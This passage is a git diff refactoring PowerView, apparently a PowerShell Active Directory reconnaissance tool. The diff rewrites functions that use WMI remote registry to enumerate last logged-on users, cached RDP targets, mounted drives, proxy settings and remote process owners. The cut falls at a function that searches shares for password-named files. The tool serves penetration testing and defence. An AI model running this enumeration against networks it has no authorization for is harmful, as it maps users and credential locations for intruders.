- $Computer = [System.Net.Dns]::GetHostByAddress($Computer)
- }
- else {
- $IPAddress = @(Get-IPAddress -ComputerName $Computer)[0].IPAddress
+ BEGIN {
+ if ($PSBoundParameters['Credential']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
+ }
}
- $PtrInfo = [IntPtr]::Zero
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ # if we get an IP address, try to resolve the IP to a hostname
+ if ($Computer -match '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$') {
+ $IPAddress = $Computer
+ $Computer = [System.Net.Dns]::GetHostByAddress($Computer) | Select-Object -ExpandProperty HostName
+ }
+ else {
+ $IPAddress = @(Resolve-IPAddress -ComputerName $Computer)[0].IPAddress
+ }
- $Result = $Netapi32::DsGetSiteName($Computer, [ref]$PtrInfo)
+ $PtrInfo = [IntPtr]::Zero
- $ComputerSite = New-Object PSObject
- $ComputerSite | Add-Member Noteproperty 'ComputerName' $Computer
- $ComputerSite | Add-Member Noteproperty 'IPAddress' $IPAddress
+ $Result = $Netapi32::DsGetSiteName($Computer, [ref]$PtrInfo)
- if ($Result -eq 0) {
- $Sitename = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($PtrInfo)
- $ComputerSite | Add-Member Noteproperty 'SiteName' $Sitename
- }
- else {
- $ErrorMessage = "Error: $(([ComponentModel.Win32Exception] $Result).Message)"
- $ComputerSite | Add-Member Noteproperty 'SiteName' $ErrorMessage
- }
+ $ComputerSite = New-Object PSObject
+ $ComputerSite | Add-Member Noteproperty 'ComputerName' $Computer
+ $ComputerSite | Add-Member Noteproperty 'IPAddress' $IPAddress
+
+ if ($Result -eq 0) {
+ $Sitename = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($PtrInfo)
+ $ComputerSite | Add-Member Noteproperty 'SiteName' $Sitename
+ }
+ else {
+ Write-Verbose "[Get-NetComputerSiteName] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+ $ComputerSite | Add-Member Noteproperty 'SiteName' ''
+ }
+ $ComputerSite.PSObject.TypeNames.Insert(0, 'PowerView.ComputerSite')
+
+ # free up the result buffer
+ $Null = $Netapi32::NetApiBufferFree($PtrInfo)
- $Null = $Netapi32::NetApiBufferFree($PtrInfo)
+ $ComputerSite
+ }
+ }
- $ComputerSite
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
+ }
+ }
}
-filter Get-LastLoggedOn {
+function Get-WMIRegProxy {
<#
- .SYNOPSIS
+.SYNOPSIS
- This function uses remote registry functionality to return
- the last user logged onto a target machine.
+Enumerates the proxy server and WPAD conents for the current user.
- Note: This function requires administrative rights on the
- machine you're enumerating.
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
- .PARAMETER ComputerName
+.DESCRIPTION
- The hostname to query for the last logged on user.
- Defaults to the localhost.
+Enumerates the proxy server and WPAD specification for the current user
+on the local machine (default), or a machine specified with -ComputerName.
+It does this by enumerating settings from
+HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings.
- .PARAMETER Credential
+.PARAMETER ComputerName
- A [Management.Automation.PSCredential] object for the remote connection.
+Specifies the system to enumerate proxy settings on. Defaults to the local host.
- .EXAMPLE
+.PARAMETER Credential
- PS C:\> Get-LastLoggedOn
+A [Management.Automation.PSCredential] object of alternate credentials
+for connecting to the remote system.
- Returns the last user logged onto the local machine.
+.EXAMPLE
- .EXAMPLE
-
- PS C:\> Get-LastLoggedOn -ComputerName WINDOWS1
+Get-WMIRegProxy
- Returns the last user logged onto WINDOWS1
+ComputerName ProxyServer AutoConfigURL Wpad
+------------ ----------- ------------- ----
+WINDOWS1 http://primary.test...
- .EXAMPLE
-
- PS C:\> Get-NetComputer | Get-LastLoggedOn
+.EXAMPLE
- Returns the last user logged onto all machines in the domain.
+$Cred = Get-Credential "TESTLAB\administrator"
+Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local
+
+ComputerName ProxyServer AutoConfigURL Wpad
+------------ ----------- ------------- ----
+windows1.testlab.local primary.testlab.local
+
+.INPUTS
+
+String
+
+Accepts one or more computer name specification strings on the pipeline (netbios or FQDN).
+
+.OUTPUTS
+
+PowerView.ProxySettings
+
+Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents.
#>
+ [OutputType('PowerView.ProxySettings')]
[CmdletBinding()]
- param(
- [Parameter(ValueFromPipeline=$True)]
- [Alias('HostName')]
- [Object[]]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
- $ComputerName = 'localhost',
+ [String[]]
+ $ComputerName = $Env:COMPUTERNAME,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- # extract the computer name from whatever object was passed on the pipeline
- $Computer = $ComputerName | Get-NameField
-
- # HKEY_LOCAL_MACHINE
- $HKLM = 2147483650
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ try {
+ $WmiArguments = @{
+ 'List' = $True
+ 'Class' = 'StdRegProv'
+ 'Namespace' = 'root\default'
+ 'Computername' = $Computer
+ 'ErrorAction' = 'Stop'
+ }
+ if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
- # try to open up the remote registry key to grab the last logged on user
- try {
+ $RegProvider = Get-WmiObject @WmiArguments
+ $Key = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings'
- if($Credential) {
- $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -Credential $Credential -ErrorAction SilentlyContinue
- }
- else {
- $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -ErrorAction SilentlyContinue
- }
+ # HKEY_CURRENT_USER
+ $HKCU = 2147483649
+ $ProxyServer = $RegProvider.GetStringValue($HKCU, $Key, 'ProxyServer').sValue
+ $AutoConfigURL = $RegProvider.GetStringValue($HKCU, $Key, 'AutoConfigURL').sValue
- $Key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI"
- $Value = "LastLoggedOnUser"
- $LastUser = $Reg.GetStringValue($HKLM, $Key, $Value).sValue
+ $Wpad = ''
+ if ($AutoConfigURL -and ($AutoConfigURL -ne '')) {
+ try {
+ $Wpad = (New-Object Net.WebClient).DownloadString($AutoConfigURL)
+ }
+ catch {
+ Write-Warning "[Get-WMIRegProxy] Error connecting to AutoConfigURL : $AutoConfigURL"
+ }
+ }
- $LastLoggedOn = New-Object PSObject
- $LastLoggedOn | Add-Member Noteproperty 'ComputerName' $Computer
- $LastLoggedOn | Add-Member Noteproperty 'LastLoggedOn' $LastUser
- $LastLoggedOn
- }
- catch {
- Write-Warning "[!] Error opening remote registry on $Computer. Remote registry likely not enabled."
+ if ($ProxyServer -or $AutoConfigUrl) {
+ $Out = New-Object PSObject
+ $Out | Add-Member Noteproperty 'ComputerName' $Computer
+ $Out | Add-Member Noteproperty 'ProxyServer' $ProxyServer
+ $Out | Add-Member Noteproperty 'AutoConfigURL' $AutoConfigURL
+ $Out | Add-Member Noteproperty 'Wpad' $Wpad
+ $Out.PSObject.TypeNames.Insert(0, 'PowerView.ProxySettings')
+ $Out
+ }
+ else {
+ Write-Warning "[Get-WMIRegProxy] No proxy settings found for $ComputerName"
+ }
+ }
+ catch {
+ Write-Warning "[Get-WMIRegProxy] Error enumerating proxy settings for $ComputerName : $_"
+ }
+ }
}
}
-filter Get-CachedRDPConnection {
+function Get-WMIRegLastLoggedOn {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Returns the last user who logged onto the local (or a remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+.DESCRIPTION
+
+This function uses remote registry to enumerate the LastLoggedOnUser registry key
+for the local (or remote) machine.
- Uses remote registry functionality to query all entries for the
- "Windows Remote Desktop Connection Client" on a machine, separated by
- user and target server.
+.PARAMETER ComputerName
- Note: This function requires administrative rights on the
- machine you're enumerating.
+Specifies the hostname to query for remote registry values (also accepts IP addresses).
+Defaults to 'localhost'.
- .PARAMETER ComputerName
+.PARAMETER Credential
- The hostname to query for RDP client information.
- Defaults to localhost.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connecting to the remote system.
- .PARAMETER Credential
+.EXAMPLE
- A [Management.Automation.PSCredential] object for the remote connection.
+Get-WMIRegLastLoggedOn
- .EXAMPLE
+Returns the last user logged onto the local machine.
- PS C:\> Get-CachedRDPConnection
+.EXAMPLE
- Returns the RDP connection client information for the local machine.
+Get-WMIRegLastLoggedOn -ComputerName WINDOWS1
- .EXAMPLE
+Returns the last user logged onto WINDOWS1
- PS C:\> Get-CachedRDPConnection -ComputerName WINDOWS2.testlab.local
+.EXAMPLE
- Returns the RDP connection client information for the WINDOWS2.testlab.local machine
+Get-DomainComputer | Get-WMIRegLastLoggedOn
- .EXAMPLE
+Returns the last user logged onto all machines in the domain.
- PS C:\> Get-CachedRDPConnection -ComputerName WINDOWS2.testlab.local -Credential $Cred
+.EXAMPLE
- Returns the RDP connection client information for the WINDOWS2.testlab.local machine using alternate credentials.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred
- .EXAMPLE
+.OUTPUTS
- PS C:\> Get-NetComputer | Get-CachedRDPConnection
+PowerView.LastLoggedOnUser
- Get cached RDP information for all machines in the domain.
+A PSCustomObject containing the ComputerName and last loggedon user.
#>
+ [OutputType('PowerView.LastLoggedOnUser')]
[CmdletBinding()]
- param(
- [Parameter(ValueFromPipeline=$True)]
- [Alias('HostName')]
- [Object[]]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
+ [String[]]
$ComputerName = 'localhost',
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- # extract the computer name from whatever object was passed on the pipeline
- $Computer = $ComputerName | Get-NameField
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ # HKEY_LOCAL_MACHINE
+ $HKLM = 2147483650
- # HKEY_USERS
- $HKU = 2147483651
+ $WmiArguments = @{
+ 'List' = $True
+ 'Class' = 'StdRegProv'
+ 'Namespace' = 'root\default'
+ 'Computername' = $Computer
+ 'ErrorAction' = 'SilentlyContinue'
+ }
+ if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
- try {
- if($Credential) {
- $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -Credential $Credential -ErrorAction SilentlyContinue
- }
- else {
- $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -ErrorAction SilentlyContinue
+ # try to open up the remote registry key to grab the last logged on user
+ try {
+ $Reg = Get-WmiObject @WmiArguments
+
+ $Key = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI'
+ $Value = 'LastLoggedOnUser'
+ $LastUser = $Reg.GetStringValue($HKLM, $Key, $Value).sValue
+
+ $LastLoggedOn = New-Object PSObject
+ $LastLoggedOn | Add-Member Noteproperty 'ComputerName' $Computer
+ $LastLoggedOn | Add-Member Noteproperty 'LastLoggedOn' $LastUser
+ $LastLoggedOn.PSObject.TypeNames.Insert(0, 'PowerView.LastLoggedOnUser')
+ $LastLoggedOn
+ }
+ catch {
+ Write-Warning "[Get-WMIRegLastLoggedOn] Error opening remote registry on $Computer. Remote registry likely not enabled."
+ }
}
+ }
+}
- # extract out the SIDs of domain users in this hive
- $UserSIDs = ($Reg.EnumKey($HKU, "")).sNames | ? { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
- foreach ($UserSID in $UserSIDs) {
+function Get-WMIRegCachedRDPConnection {
+<#
+.SYNOPSIS
+
+Returns information about RDP connections outgoing from the local (or remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: ConvertFrom-SID
+
+.DESCRIPTION
+
+Uses remote registry functionality to query all entries for the
+"Windows Remote Desktop Connection Client" on a machine, separated by
+user and target server.
+
+.PARAMETER ComputerName
+
+Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
+Defaults to 'localhost'.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connecting to the remote system.
+
+.EXAMPLE
+
+Get-WMIRegCachedRDPConnection
+
+Returns the RDP connection client information for the local machine.
+
+.EXAMPLE
+
+Get-WMIRegCachedRDPConnection -ComputerName WINDOWS2.testlab.local
+
+Returns the RDP connection client information for the WINDOWS2.testlab.local machine
+
+.EXAMPLE
+
+Get-DomainComputer | Get-WMIRegCachedRDPConnection
+
+Returns cached RDP information for all machines in the domain.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+.OUTPUTS
+
+PowerView.CachedRDPConnection
+
+A PSCustomObject containing the ComputerName and cached RDP information.
+#>
+
+ [OutputType('PowerView.CachedRDPConnection')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ComputerName = 'localhost',
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ # HKEY_USERS
+ $HKU = 2147483651
+
+ $WmiArguments = @{
+ 'List' = $True
+ 'Class' = 'StdRegProv'
+ 'Namespace' = 'root\default'
+ 'Computername' = $Computer
+ 'ErrorAction' = 'Stop'
+ }
+ if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
try {
- $UserName = Convert-SidToName $UserSID
+ $Reg = Get-WmiObject @WmiArguments
- # pull out all the cached RDP connections
- $ConnectionKeys = $Reg.EnumValues($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Default").sNames
+ # extract out the SIDs of domain users in this hive
+ $UserSIDs = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
- foreach ($Connection in $ConnectionKeys) {
- # make sure this key is a cached connection
- if($Connection -match 'MRU.*') {
- $TargetServer = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Default", $Connection).sValue
-
- $FoundConnection = New-Object PSObject
- $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer
- $FoundConnection | Add-Member Noteproperty 'UserName' $UserName
- $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID
- $FoundConnection | Add-Member Noteproperty 'TargetServer' $TargetServer
- $FoundConnection | Add-Member Noteproperty 'UsernameHint' $Null
- $FoundConnection
- }
- }
+ ForEach ($UserSID in $UserSIDs) {
+ try {
+ if ($PSBoundParameters['Credential']) {
+ $UserName = ConvertFrom-SID -ObjectSid $UserSID -Credential $Credential
+ }
+ else {
+ $UserName = ConvertFrom-SID -ObjectSid $UserSID
+ }
+
+ # pull out all the cached RDP connections
+ $ConnectionKeys = $Reg.EnumValues($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Default").sNames
+
+ ForEach ($Connection in $ConnectionKeys) {
+ # make sure this key is a cached connection
+ if ($Connection -match 'MRU.*') {
+ $TargetServer = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Default", $Connection).sValue
+
+ $FoundConnection = New-Object PSObject
+ $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer
+ $FoundConnection | Add-Member Noteproperty 'UserName' $UserName
+ $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID
+ $FoundConnection | Add-Member Noteproperty 'TargetServer' $TargetServer
+ $FoundConnection | Add-Member Noteproperty 'UsernameHint' $Null
+ $FoundConnection.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection')
+ $FoundConnection
+ }
+ }
- # pull out all the cached server info with username hints
- $ServerKeys = $Reg.EnumKey($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Servers").sNames
+ # pull out all the cached server info with username hints
+ $ServerKeys = $Reg.EnumKey($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Servers").sNames
- foreach ($Server in $ServerKeys) {
+ ForEach ($Server in $ServerKeys) {
- $UsernameHint = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Servers\$Server", 'UsernameHint').sValue
-
- $FoundConnection = New-Object PSObject
- $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer
- $FoundConnection | Add-Member Noteproperty 'UserName' $UserName
- $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID
- $FoundConnection | Add-Member Noteproperty 'TargetServer' $Server
- $FoundConnection | Add-Member Noteproperty 'UsernameHint' $UsernameHint
- $FoundConnection
- }
+ $UsernameHint = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Servers\$Server", 'UsernameHint').sValue
+ $FoundConnection = New-Object PSObject
+ $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer
+ $FoundConnection | Add-Member Noteproperty 'UserName' $UserName
+ $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID
+ $FoundConnection | Add-Member Noteproperty 'TargetServer' $Server
+ $FoundConnection | Add-Member Noteproperty 'UsernameHint' $UsernameHint
+ $FoundConnection.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection')
+ $FoundConnection
+ }
+ }
+ catch {
+ Write-Verbose "[Get-WMIRegCachedRDPConnection] Error: $_"
+ }
+ }
}
catch {
- Write-Verbose "Error: $_"
+ Write-Warning "[Get-WMIRegCachedRDPConnection] Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_"
}
}
-
- }
- catch {
- Write-Warning "Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_"
}
}
-filter Get-RegistryMountedDrive {
+function Get-WMIRegMountedDrive {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Returns information about saved network mounted drives for the local (or remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: ConvertFrom-SID
+
+.DESCRIPTION
- Uses remote registry functionality to query all entries for the
- the saved network mounted drive on a machine, separated by
- user and target server.
+Uses remote registry functionality to enumerate recently mounted network drives.
- Note: This function requires administrative rights on the
- machine you're enumerating.
+.PARAMETER ComputerName
- .PARAMETER ComputerName
+Specifies the hostname to query for mounted drive information (also accepts IP addresses).
+Defaults to 'localhost'.
- The hostname to query for RDP client information.
- Defaults to localhost.
+.PARAMETER Credential
- .PARAMETER Credential
+A [Management.Automation.PSCredential] object of alternate credentials
+for connecting to the remote system.
- A [Management.Automation.PSCredential] object for the remote connection.
+.EXAMPLE
- .EXAMPLE
+Get-WMIRegMountedDrive
- PS C:\> Get-RegistryMountedDrive
+Returns the saved network mounted drives for the local machine.
- Returns the saved network mounted drives for the local machine.
+.EXAMPLE
- .EXAMPLE
+Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local
- PS C:\> Get-RegistryMountedDrive -ComputerName WINDOWS2.testlab.local
+Returns the saved network mounted drives for the WINDOWS2.testlab.local machine
- Returns the saved network mounted drives for the WINDOWS2.testlab.local machine
+.EXAMPLE
- .EXAMPLE
+Get-DomainComputer | Get-WMIRegMountedDrive
- PS C:\> Get-RegistryMountedDrive -ComputerName WINDOWS2.testlab.local -Credential $Cred
+Returns the saved network mounted drives for all machines in the domain.
- Returns the saved network mounted drives for the WINDOWS2.testlab.local machine using alternate credentials.
+.EXAMPLE
- .EXAMPLE
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred
- PS C:\> Get-NetComputer | Get-RegistryMountedDrive
+.OUTPUTS
- Get the saved network mounted drives for all machines in the domain.
+PowerView.RegMountedDrive
+
+A PSCustomObject containing the ComputerName and mounted drive information.
#>
+ [OutputType('PowerView.RegMountedDrive')]
[CmdletBinding()]
- param(
- [Parameter(ValueFromPipeline=$True)]
- [Alias('HostName')]
- [Object[]]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
+ [String[]]
$ComputerName = 'localhost',
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- # extract the computer name from whatever object was passed on the pipeline
- $Computer = $ComputerName | Get-NameField
-
- # HKEY_USERS
- $HKU = 2147483651
-
- try {
- if($Credential) {
- $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -Credential $Credential -ErrorAction SilentlyContinue
- }
- else {
- $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -ErrorAction SilentlyContinue
- }
-
- # extract out the SIDs of domain users in this hive
- $UserSIDs = ($Reg.EnumKey($HKU, "")).sNames | ? { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ # HKEY_USERS
+ $HKU = 2147483651
- foreach ($UserSID in $UserSIDs) {
+ $WmiArguments = @{
+ 'List' = $True
+ 'Class' = 'StdRegProv'
+ 'Namespace' = 'root\default'
+ 'Computername' = $Computer
+ 'ErrorAction' = 'Stop'
+ }
+ if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
try {
- $UserName = Convert-SidToName $UserSID
+ $Reg = Get-WmiObject @WmiArguments
- $DriveLetters = ($Reg.EnumKey($HKU, "$UserSID\Network")).sNames
+ # extract out the SIDs of domain users in this hive
+ $UserSIDs = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
- ForEach($DriveLetter in $DriveLetters) {
- $ProviderName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'ProviderName').sValue
- $RemotePath = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'RemotePath').sValue
- $DriveUserName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'UserName').sValue
- if(-not $UserName) { $UserName = '' }
+ ForEach ($UserSID in $UserSIDs) {
+ try {
+ if ($PSBoundParameters['Credential']) {
+ $UserName = ConvertFrom-SID -ObjectSid $UserSID -Credential $Credential
+ }
+ else {
+ $UserName = ConvertFrom-SID -ObjectSid $UserSID
+ }
- if($RemotePath -and ($RemotePath -ne '')) {
- $MountedDrive = New-Object PSObject
- $MountedDrive | Add-Member Noteproperty 'ComputerName' $Computer
- $MountedDrive | Add-Member Noteproperty 'UserName' $UserName
- $MountedDrive | Add-Member Noteproperty 'UserSID' $UserSID
- $MountedDrive | Add-Member Noteproperty 'DriveLetter' $DriveLetter
- $MountedDrive | Add-Member Noteproperty 'ProviderName' $ProviderName
- $MountedDrive | Add-Member Noteproperty 'RemotePath' $RemotePath
- $MountedDrive | Add-Member Noteproperty 'DriveUserName' $DriveUserName
- $MountedDrive
+ $DriveLetters = ($Reg.EnumKey($HKU, "$UserSID\Network")).sNames
+
+ ForEach ($DriveLetter in $DriveLetters) {
+ $ProviderName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'ProviderName').sValue
+ $RemotePath = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'RemotePath').sValue
+ $DriveUserName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'UserName').sValue
+ if (-not $UserName) { $UserName = '' }
+
+ if ($RemotePath -and ($RemotePath -ne '')) {
+ $MountedDrive = New-Object PSObject
+ $MountedDrive | Add-Member Noteproperty 'ComputerName' $Computer
+ $MountedDrive | Add-Member Noteproperty 'UserName' $UserName
+ $MountedDrive | Add-Member Noteproperty 'UserSID' $UserSID
+ $MountedDrive | Add-Member Noteproperty 'DriveLetter' $DriveLetter
+ $MountedDrive | Add-Member Noteproperty 'ProviderName' $ProviderName
+ $MountedDrive | Add-Member Noteproperty 'RemotePath' $RemotePath
+ $MountedDrive | Add-Member Noteproperty 'DriveUserName' $DriveUserName
+ $MountedDrive.PSObject.TypeNames.Insert(0, 'PowerView.RegMountedDrive')
+ $MountedDrive
+ }
+ }
+ }
+ catch {
+ Write-Verbose "[Get-WMIRegMountedDrive] Error: $_"
}
}
}
catch {
- Write-Verbose "Error: $_"
+ Write-Warning "[Get-WMIRegMountedDrive] Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_"
}
}
}
- catch {
- Write-Warning "Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_"
- }
}
-filter Get-NetProcess {
+function Get-WMIProcess {
<#
- .SYNOPSIS
+.SYNOPSIS
- Gets a list of processes/owners on a remote machine.
+Returns a list of processes and their owners on the local or remote machine.
- .PARAMETER ComputerName
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
- The hostname to query processes. Defaults to the local host name.
+.DESCRIPTION
- .PARAMETER Credential
+Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine,
+including the owners of the particular process.
- A [Management.Automation.PSCredential] object for the remote connection.
+.PARAMETER ComputerName
- .EXAMPLE
+Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
+Defaults to 'localhost'.
- PS C:\> Get-NetProcess -ComputerName WINDOWS1
-
- Returns the current processes for WINDOWS1
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system.
+
+.EXAMPLE
+
+Get-WMIProcess -ComputerName WINDOWS1
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+.OUTPUTS
+
+PowerView.UserProcess
+
+A PSCustomObject containing the remote process information.
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.UserProcess')]
[CmdletBinding()]
- param(
- [Parameter(ValueFromPipeline=$True)]
- [Alias('HostName')]
- [Object[]]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
- $ComputerName = [System.Net.Dns]::GetHostName(),
+ [String[]]
+ $ComputerName = 'localhost',
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- # extract the computer name from whatever object was passed on the pipeline
- $Computer = $ComputerName | Get-NameField
-
- try {
- if($Credential) {
- $Processes = Get-WMIobject -Class Win32_process -ComputerName $ComputerName -Credential $Credential
- }
- else {
- $Processes = Get-WMIobject -Class Win32_process -ComputerName $ComputerName
- }
-
- $Processes | ForEach-Object {
- $Owner = $_.getowner();
- $Process = New-Object PSObject
- $Process | Add-Member Noteproperty 'ComputerName' $Computer
- $Process | Add-Member Noteproperty 'ProcessName' $_.ProcessName
- $Process | Add-Member Noteproperty 'ProcessID' $_.ProcessID
- $Process | Add-Member Noteproperty 'Domain' $Owner.Domain
- $Process | Add-Member Noteproperty 'User' $Owner.User
- $Process
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ try {
+ $WmiArguments = @{
+ 'ComputerName' = $ComputerName
+ 'Class' = 'Win32_process'
+ }
+ if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
+ Get-WMIobject @WmiArguments | ForEach-Object {
+ $Owner = $_.getowner();
+ $Process = New-Object PSObject
+ $Process | Add-Member Noteproperty 'ComputerName' $Computer
+ $Process | Add-Member Noteproperty 'ProcessName' $_.ProcessName
+ $Process | Add-Member Noteproperty 'ProcessID' $_.ProcessID
+ $Process | Add-Member Noteproperty 'Domain' $Owner.Domain
+ $Process | Add-Member Noteproperty 'User' $Owner.User
+ $Process.PSObject.TypeNames.Insert(0, 'PowerView.UserProcess')
+ $Process
+ }
+ }
+ catch {
+ Write-Verbose "[Get-WMIProcess] Error enumerating remote processes on '$Computer', access likely denied: $_"
+ }
}
}
- catch {
- Write-Verbose "[!] Error enumerating remote processes on $Computer, access likely denied: $_"
- }
}
function Find-InterestingFile {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Searches for files on the given path that match a series of specified criteria.
- This function recursively searches a given UNC path for files with
- specific keywords in the name (default of pass, sensitive, secret, admin,
- login and unattend*.xml). The output can be piped out to a csv with the
- -OutFile flag. By default, hidden files/folders are included in search results.
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
